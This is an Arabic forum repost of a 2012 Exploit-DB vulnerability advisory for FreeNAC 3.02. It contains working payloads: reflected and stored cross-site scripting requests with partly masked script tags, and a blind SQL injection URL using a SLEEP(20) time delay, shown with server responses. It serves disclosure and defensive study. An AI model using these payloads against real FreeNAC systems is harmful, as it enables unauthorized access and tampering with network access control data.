بسم الله الرحمن الرحيم



كود PHP:
FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties
Date
May 192012
Author
Blake
Software Link
http://sourceforge.net/project/showfiles.php?group_id=170004
Version3.02
Tested on
Ubuntu 8.04 (freenac version 3.02 vmware appliance)
 
FreeNAC FreeNAC provides Virtual LAN assignmentLAN access control (for all kinds of network devices such as ServersWorkstationsPrintersIP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.
 
 
==========================================================================================================================================
Reflective Cross-Site Scripting:
Multiple parameters are vulnerable to reflective cross-site scripting.
 
Affected Parameters:
comment
mac
graphtype
type
name
 
 
Example Request:
GET /stats.php?graphtype=bar&type=vlan13**********alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e
 
Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
      ****** http-*****="Content-Type" content="text/html; charset=iso-8859-1" />
      <title>FreeNAC :: Swisscom ::</title>
      <link href="bw.css" rel="stylesheet" type="text/css" />
    </head>
<a href='
./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>
 
 
..........snip......................
 
<img src="statgraph.php?stattype=vlan13**********alert(1)</script>&order=DESC&graphtype=bar"><br>
<br>  <p class='
UpdateMsg'>Database error</p>
  <p>Please go <a HREF='
javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the
  <a href='
./index.php' >Main Menu</a> and start again, or try again later.  </p>
 
 
 
 
==========================================================================================================================================
Stored Cross-Site Scripting:
The comment parameter is vulnerable to stored cross-site scripting.
 
Example Request:
<changed from a POST to a GET>
http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment=">**********alert(2)</script>&action=Update&action_idx=1
 
Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
      ****** http-*****="Content-Type" content="text/html; charset=iso-8859-1" />
      <title>FreeNAC :: Swisscom ::</title>
      <link href="bw.css" rel="stylesheet" type="text/css" />
    </head>
<a href='
./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>
 
.............snip.................
 
</td></tr>
         <tr><td>Switch:</td>
           <td>, port= , location=  </td>
           <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td>
         </tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value="">**********alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
          <tr><td> </td><td>
          <input type="submit" name="action" class="bluebox" value="Update" /> 
          <input type="submit" name="action" class="bluebox" value="Delete"
            onClick="javascript:return confirm('
Really DELETE this end-device record?')"
            />
          </td></tr>'
<tr><td> </td><td></td></tr>
<
tr><td> </td><td></td></tr>
</
table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<
tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<
tr><td>Classification:
 
 
............
snip....................
 
 
 
 
 
==========================================================================================================================================
SQL Injection:
 
The status parameter is vulnerable to blind SQL Injection.
Injecting a time-delay of 20 seconds:
 
http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1 




رابط الثغره : http://www.exploit-db.com/exploits/18900


تحياتي